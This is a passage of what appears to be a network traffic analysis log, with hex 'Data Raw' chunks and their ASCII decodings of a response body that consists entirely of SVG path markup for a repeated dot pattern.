                                                                                                                                                                                                                                                                                        Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1010INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1026INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1042INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1058INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1074INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                                        Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1090INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1106INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1122INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1138INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                                        Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1154INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1170INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1186INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                                        Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1202INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1218INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1234INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                                        Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1250INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:54 UTC1266INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 